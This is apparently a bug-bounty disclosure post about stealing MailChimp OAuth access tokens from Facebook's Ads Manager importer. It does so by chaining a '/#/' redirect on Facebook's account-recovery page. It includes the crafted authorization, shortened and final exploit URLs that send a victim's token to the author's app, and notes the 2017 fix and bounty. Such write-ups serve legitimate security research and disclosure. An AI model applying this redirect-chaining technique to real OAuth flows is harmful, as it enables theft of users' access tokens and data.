Stealing Facebook MailChimp Application OAuth 2.0 Access Token

This post is about an bug that i found on Facebook MailChimp Application OAuth 2.0 which could have been used to steal Access_token. and The Source idea for this bug i got from prakharprasad blog post.

Image for post
Image for post
Mailchip oauth 2.0

Facebook Ads Manager can import MailChimp customer data by using OAuth 2.0, to fetch data to Facebook Ads Manager.The application is a part of MailChimp website and it was developed by Facebook Developers. once the MailChimp user authorises the application, it will send MailChimp data to Facebook Ads Manager.

OAuth Authorisation URL for Facebook Custom Audiences :

Request :

https://login.mailchimp.com/oauth2/authorize?client_id=112041070777&response_type=token&redirect_uri=http://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/

Response :

https://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/#access_token=4uhbf9d433187acg50mk40cef13ec847&expires_in=0

First i tried to bypass redirect_uri but i can’t. then i tried the same oauth flow when i logged out in Facebook. it force me to login page.

https://www.facebook.com/login.php?next=https%3A%2F%2Fmailchimp-oauth.facebook.com%2Fads%2Fmanage%2Fcontact_importer_auth%2F#access_token=4uhbf9d433187acg50mk40cef13ec847&expires_in=0

but /#/ redirection will not work in login.php page. so i need to bypass the default login page .after some search finally found this URL to bypasses default login page. and the /#/ redirection also worked here.

https://www.facebook.com/recover/initiate?hacked=1

Mailchip oauth URL:

https://login.mailchimp.com/oauth2/authorize?client_id=112041070777&response_type=token&redirect_uri=http://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/#/n/?https://apps.facebook.com/redirectbug_mailchip

Shorten the Above URL :

https://goo.gl/2Ep6BT

Final URL :

https://www.facebook.com/recover/initiate?hacked=1#/#/n/?business/url/?href=https://goo.gl/2Ep6BT&creative=1

The Victim click the above URL it redirect to Mailchip oauth page and ask for credentials. once the login was success the response access token will be redirect to my Facebook app URL.

The Fix :

Now /#/ redirection will not work for /recover/initiate/ page . so the token will not redirect to other path.

Timeline:

8-June-2017 : Report Sent

15 June-2017 : Further investigation by Facebook

16 June-2017 : Fixed by Facebook

22 June-2017 : $500 bounty awarded by Facebook

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store